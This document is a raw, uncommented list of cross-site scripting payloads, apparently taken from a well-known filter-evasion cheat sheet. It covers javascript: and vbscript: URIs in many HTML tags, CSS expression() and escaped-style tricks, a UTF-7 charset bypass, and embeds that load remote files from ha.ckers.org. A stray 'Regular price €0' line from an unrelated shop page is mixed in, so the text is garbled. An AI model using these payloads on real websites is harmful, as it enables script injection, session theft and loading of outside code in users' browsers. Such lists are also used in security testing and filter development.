alert("XSS");
<BASE HREF=\"javascript:alert('XSS');//\">
Regular price €0
<BGSOUND SRC=\"javascript:alert('XSS');\">
<BODY BACKGROUND=\"javascript:alert('XSS')\">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>
<BODY ONLOAD=alert('XSS')>
<BR SIZE=\"&{alert('XSS')}\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
<DIV STYLE=\"width: expression(alert('XSS'));\">
<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>
<HTML><BODY>
<iframe src=http://ha.ckers.org/scriptlet.html>
<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
<IMG DYNSRC=\"javascript:alert('XSS')\">
<IMG LOWSRC=\"javascript:alert('XSS')\">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC='vbscript:msgbox(\"XSS\")'>
<IMG SRC=javascript:alert("XSS")>